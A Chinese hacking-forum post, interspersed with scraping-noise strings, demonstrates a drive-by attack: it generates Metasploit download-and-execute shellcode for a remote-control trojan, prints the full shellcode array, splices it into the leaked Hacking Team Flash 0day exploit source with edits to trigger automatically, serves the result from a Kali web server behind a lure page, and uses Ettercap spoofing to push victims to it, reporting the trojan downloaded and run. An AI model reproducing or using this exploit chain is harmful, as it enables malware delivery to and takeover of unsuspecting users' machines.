找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1593|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 m) ~' w3 s& k b- g4 O# E$ D 三、flash 0day之手工代码修改制作下载者实例入侵演示 4 E/ @% A, ~: p0 F

( U. w+ Q( h8 C! h4 \" _5 T

$ I, @5 ?9 K: G; q9 s 利用到的工具: ( O: n2 l3 B1 V, q

( B: L& b& F, H! a" N. A4 s

6 I3 X* b5 D- n" x Msf ) N% e4 }0 J3 p+ E

. C, _' M( L" C* r: G. ~

! `) ~* j4 R$ {# S1 I; p Ettercap + G, M8 l: w# J3 |; l, i

0 S. I/ Q1 X7 E2 m3 B. z

b" u( I+ M% y, b8 k Adobe Flash CS6 $ P& w4 }2 D0 t3 u5 w3 N

& z# o. U2 V. F" D* \6 X* ?

7 L* [8 ?9 \8 c. J6 z Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 " p8 ?7 ^& s. H- K! \6 t5 I2 ]

/ r8 O9 ]2 k) H, d1 o

, y0 U) L G0 e/ n0 [ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options - ?1 R) a* {$ d- l) g4 K

) G# A& ~7 A$ E3 R$ A5 W* D1 M5 O7 h

4 P6 U0 i l$ G* C5 ~3 H 如图: # ~4 l+ F7 a+ n: v' b

( {# ^2 W( j* D6 O# c( h) T% k% |

{) p* Y; u+ N% J0 H   ( R0 l! _( s2 {' U* v: r0 ?

- Z+ Z+ J8 ?1 Q

: S9 s% r: f! z. x' h8 r/ w   8 M+ x' P& v$ L# } Q: p4 h

! y4 z& u7 H* H, c- m

/ L& L5 j5 s( A S" ?8 q4 W) X2 c 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + D8 w& O5 h8 s' P5 N

) K$ Z8 L# F) y2 [

( w6 N6 _ L1 @& |) p- D& |8 Q! t   0 Y5 K! I8 c r, |4 ^2 j

1 S! K$ H" ?' O* a* U: F- E

0 h3 I) B0 q, N- B/ U   1 U. D+ m) w7 N4 C

1 F7 x# {1 _ J- \: n2 T

: w" d( g& H6 L 然后执行generate -t dword生成shellcode,如下: 9 C y7 F: j( R; Z) Z% n

+ r8 o% V# l2 u: X( C. c5 J

0 u0 ~, ?0 j. V, e/ e6 W! x   : b" N& }5 w9 O, b

5 m, D- i# V* Z: C4 l' ]

7 C: Y7 O m. {& S! M: D 复制代码到文本下便于我们一会编辑flash exp,如下: 2 g& v5 r% t- I" Q* g

0 @" K7 D7 Z3 n; {

& i s4 B6 m9 B; E: m. C! L% X7 l3 D 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 8 b" Y! C3 T) n* N+ G

6 {9 D5 F% A* I( L

6 M) ?# }/ o0 S3 W$ ^- R3 T/ d 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, , ^( e! R9 M* S5 `2 {

, {2 s& q: Z- U3 i

8 k T" Z) w0 ] 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ) U$ ^0 e& r! G: \3 X& Z( x

3 [' b1 ?$ A6 O; q: _! C

5 b5 |, [ G2 J* u, u# l7 Z( H U5 F$ J 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, $ d4 Z0 Z. _; w. U) F- j/ u

9 N& C# K4 J( e6 S; {/ H

& k$ @* v C% H* C1 N& k 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ( g) o. r) D/ V2 _, {: D' S$ c: }

4 J0 ?: J; }4 K; U+ }

% O6 F5 N* o# A) l! @9 ~1 f% G4 M 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 1 z* a5 i$ t5 i, U+ u2 |* g) D/ h

! P& X5 p/ ?3 i. ^1 ~6 F, P4 {. L

5 N3 b0 e' a4 @3 }4 \( H/ T( Z P 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ; |0 E. L8 w$ r5 K# H6 b

: T6 @$ [2 i. b& x& n' V

/ ^4 _& I z0 k+ g 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 9 G% @' T) A* N4 w& W. P* f; _* c

" Q( Y# [2 x9 T& x+ Q, {

+ }* |& l9 Y2 U, i 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 8 v; ?9 A0 M1 G' s$ N/ }

9 V* i: G; W" A6 }% C. V7 l

% v+ G" h8 m0 o 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, $ F2 _2 ~0 c# {# m3 D- I7 d6 J4 e7 E

) i: P. }, l9 E$ V/ _2 C* l+ m

/ D9 X3 M# {. C- j$ w/ Y 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ; C% k. s" I) {/ G! K2 C! h1 ]

! u$ J/ ]) F$ ~& d

& H( y% n3 K C2 P. ` 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 4 y F; x" C; ]" Z- ^% F

/ i! i1 `% p+ r; b

$ [ T( t* h+ o( _, s2 J0 ~3 [ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - K& Q. f( H. z" {

4 k/ o0 z% K- t/ m' g

# Z- ]: u- a) o$ { 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 # | Z# v- X& W( ^0 r

; v, [! w& [* l. }8 F" M

) l7 }1 A; L" J# \2 a   % K/ x K; X% A; v9 T: e, T

4 l$ h; Z" k0 h

5 P- \. W, E" B. a' K! I   ; | ]9 \$ K) r% Z- y* M }

3 }6 F) s9 Y2 _6 H9 u0 Y

1 L6 X# Y: Y w8 j" U- v6 }7 k4 k 下面我们来修改flash 0day exp,需要修改三个文件,分别为: # |! y; V) ^/ I

]1 V1 u* i, E; ?. m

2 m& F/ v6 Z# m   6 z& `( G; ^1 b$ H

9 R4 Q* S/ h3 N

2 C5 C8 b H- J# L 先修改ShellWin32.as,部分源代码如图: * v$ r( @! F5 M9 q- f

8 P' [2 `2 l1 J. g( o* y6 q, P

0 B0 {: C; q6 u/ G2 O# A   + Y& V8 g( s/ s+ H& J' P2 u8 [" A

4 y. ~! b7 J- C* L" w/ i1 r

5 C3 ~4 }3 N% N( j: b- n 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: - s/ K+ h' N5 h: F

: l" M5 @+ Q* `) ?1 a3 w

; |- i% D7 J2 }   ' `/ A) _5 T4 j% b

' C9 J v; D+ M( i, q8 R

5 Y) n7 a% r1 ~8 ~! f 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: / b$ l2 i5 y) w% j- ?; J+ h

0 j6 G0 b, ^4 N+ s* R, J5 k

: ^, }5 }& r1 ^: }   0 S2 @* X% N1 _( l

% `1 L( j! g% w8 C1 Z1 a4 R

1 ?: h7 o" g3 f9 q 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 7 S) _* X( p, [9 B8 e

6 S: l* |' V7 r. G8 F( h$ X$ X: x

9 e n1 @- p2 q+ {! N   1 v$ |3 ?0 i; J: V- h- L

' s& L# l1 u6 k: ~; a G

1 L7 b! g9 D0 v9 p0 b! e. t   $ M: n4 E$ S: m9 W

; P9 y( X* `/ u, @/ l$ V6 x

0 b& H0 o; }7 y" a* D! O   , Q/ r& p- N5 y

6 _$ S) l7 G7 l1 s: L! f

$ e- ?5 h) \3 K" r 然后点保存,下面我们来编译一下,打开 # ~3 U5 a( ?6 U

( ~% {1 w" t) D/ g$ N

: m; z. b! Z4 I* h' r. |- X exp1.fla然后点文件-发布,看看编译没错误 h% j; h; Y1 L' ?& u3 _1 V

. C" \8 G6 G% @ h5 n" F

, e5 G+ {9 T2 f1 M/ O1 I0 u   ; g' n" p0 b$ ?4 q

/ I7 Y4 c4 W ~8 u3 X* y, |. n

9 l7 v* J3 K( A3 D) u0 d. I   7 V3 \" s2 a3 m! @: R

7 {$ i; ^+ {5 W6 z; n# j% R! ~

3 v9 g7 f0 e' H5 D5 n0 M, V   + V3 j8 F( K' {9 h$ ?

: H0 y1 B7 f* y# f2 [* A

( `+ J+ J1 O$ M0 P# A/ R# l   + ?) _ y! t1 }. g; a8 }

4 _4 T) @7 m. h% C6 S4 k. l; M

. k+ Z8 @/ _1 v$ ~, K; p _ 然后我们把生成的 % V% f) u* I5 A) [# E: C- @4 ~) Y

8 }4 L. P% T6 y+ J" Y: ^

, q! a9 A8 ^) ]3 r exp1.swf丢到kailinux 的/var/www/html下: - b- K+ y0 V0 J" H

5 j* H+ A% v; I$ G1 |( S

9 |5 | b% n q# C 然后把这段代码好好编辑一下 " c1 ^% b* U1 j# ~% O5 q

, M; s4 K# k0 J) v2 q; ?1 f( r

) v1 }0 {1 e3 V   # e. v, J# q# y1 i

; Q$ ?% E4 t) a1 X$ u. Y

& d2 ]: C, ~$ T' R$ l- B   ; u! j8 h- D% j( B) p

# v1 m; a: x0 O- }" o' H

; t0 Z# r+ `" b2 |   ' ~# x; E! b9 g% W" G% r" @

" I9 U& w* s" h# Q; G" |

; y# r' T A: V" n- C   * F) d7 `: ]: j0 m. {3 Y5 m3 A

% e% i8 h8 V0 T* j/ R" _: j6 @

2 G7 B; e( i. n( n   $ o- a1 w2 _( U9 N

: W9 S! @5 `2 a1 |: M j5 u- r

m. a- g6 K. F* E' |1 i   9 q* Y+ ~- I1 b: `

4 i+ f x( i( }- ~6 Y; U/ _" X' L5 P

4 K z$ R+ Z; A' r, ^, a; t& p# z <!DOCTYPE html> $ l8 s* x- `# o. S# o1 o0 i

" E) Q. D9 p- ?$ X

2 [7 K4 C) r6 i4 R. { <html> 3 ~7 j. b. ~3 [$ |4 _0 R

7 u" R+ V1 v* R7 V% E1 {

V0 [2 D6 u* Y4 ^% d <head> Y( U2 V* f( W+ M5 h) v. {( |1 ~

. L. s/ o& ]+ O

- J# {3 v2 G- Y) R <meta http-equiv="Content-Type" content="text/html; 1 [8 V) N5 l6 i# b1 e8 H

( |7 W7 o' `7 t5 B, G

/ X. d1 L: l1 k7 n; |" H charset=utf-8"/> 3 V; C% f6 ^5 ~) L

5 ]/ c. O$ ^. f: t8 U$ j

- j$ @' T3 s8 P7 G6 j" M </head> : [+ N6 Z4 P: T# O9 h9 w0 [9 ~- {

0 T* q6 t3 b1 i8 y

* X6 b; A* i8 P) n- [2 [ <body> 3 L* r' `4 R# w. p, ?+ X

. \# a0 G, T3 X$ @

* @" u1 ~; j$ l0 |& O X <h2> Please wait, the requested page is loading...</h2> ( J, w9 E% }' [9 n) S: G8 o8 g

( n9 E& X& T* J9 A% r, u

( g8 Q- t5 Y7 z: N. d <br> 2 r6 d0 I$ I2 l: w

, L1 S5 g2 b7 }0 q6 J+ S

. \/ v E, Z% _0 v9 d <OBJECT . C' z% {! w" h* y; E% D

! T3 {" z0 t; T( A) j1 O

) p6 ]: m( d3 o$ Z classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie & [$ e8 V; W9 N5 L A6 p' h

6 `. w6 m' g* O' r* Y" J- Y

+ }' s' M% o+ h6 d3 i/ a* q VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) f. V5 u G: Q$ l' E1 u `/ u8 ~6 _

9 M! u" [# N/ F

. ^" i/ C# D/ f$ d$ l. l5 p- S </body> 0 V9 O3 h; J4 t# h# z) a) H* W2 l

1 H. p3 S& e: S g6 b

7 k1 a2 P, M9 e8 X <script> ' @ F. _4 i. `6 U1 c7 v

. d/ z( w9 f" ~* `

. b7 p1 ^. j2 M# E' @$ j5 e     setTimeout(function () { 4 S, D7 P3 P9 p, R/ B

# m; |& O! C1 V E1 D

+ L& E$ F! c% A/ H, X          7 t/ }6 E2 ~( v/ y: p: ]

6 g" R" F: R) t) T

+ f9 r' W0 [' h1 ^, R window.location.reload(); @; X, m* g4 ]1 ?

2 w7 B8 n% J8 \8 o9 o' E

3 l% ~( |" S# g+ f8 p; r     }, 10000); ) s5 p2 V9 G! A& Y2 T3 G- D

$ K) h8 I, l9 ^) I# [) b

( b8 \! w+ p( X, e$ i9 R0 R. \5 [) _   + K1 @: } e- Q, W

* w9 _4 y S: d$ R$ K+ ^

6 c* X9 X% m4 F0 I </script> ! x" J" H, n( {3 k8 x, l8 Z

# t! d3 y; E. _! s& H' Y

# V3 N9 m( }+ D$ R# B </html> - ^7 o) U$ Y5 V5 M) T7 K# \

3 |$ x' U3 b% I% m4 v9 K& ?

5 ~& D( C" x2 u4 D2 n1 A6 o   % W+ \2 q' G5 f) ?* F0 E

# K- v l& d& \1 P

2 e7 ~8 B2 P* i! T! l) [4 |7 F 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: & S. k1 _& i M% u2 { W$ W- Q

# @4 m! ?' L* ^$ B. }4 z

" b+ e1 E% K6 T   : M* O c8 S0 q- i! R

, E8 f \2 D* S9 |* F, W+ l

* L5 A" F' Q: [2 @4 u   4 Q( `6 Z! K0 ]" K

" {+ M8 ]( j3 A+ B1 P4 o* t+ E- |

) G% N6 Y( d6 l, \& b+ y   - E9 H0 l, Z4 \+ t$ [

9 v# j) t& W: w" c# ?. G% T+ u7 p

* W7 _+ V% k8 S1 H$ Z. K/ t   E/ O8 n8 |1 |# d( U

/ ~3 q, X: Y! ^" _

1 E& N4 Z5 r- W: {3 l3 o' \2 D   ' A6 Y4 c) w' | q. s

7 H' C4 m/ o- P

8 @9 s/ q# y: m, E. B+ a/ i% t/ g% ^ 下面我们用ettercap欺骗如图: 5 D8 j* p; ^2 g/ j

- l% E% A( O: I/ ~

) D6 e* e8 `* O4 b( |* M   7 {6 I$ T3 V9 H5 G. |

/ j, n3 l$ s4 h: m

) x8 w! |- k! c4 D4 u% U   2 l+ R1 N i+ E4 W* H

+ @9 R8 C3 F8 d' k

) P8 E# B# t) Y$ u& w1 G 下面我们随便访问个网站看看: 7 ]# n! }4 k! [2 f$ I

o# ?2 K; l% v. D. v5 H1 e

H* E0 K& A! l3 L3 c" I 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 3 J9 d L) i' S) r6 {9 {

1 G' L/ C9 a! A/ M

0 d( m+ T, X5 I( ~& [   6 M3 t8 H" s# q& w: H

, Z% a; f8 G2 o

9 w/ m! G, A! X% [. @1 V( | H 我们看另一台, ! n% ^( G; ~; z% d

( z; d( M0 D& t. Z" v; @. x; V

/ w! ^) C" ` B, l9 G3 U% j5 C. P 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ) d. L, L& J: ~

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表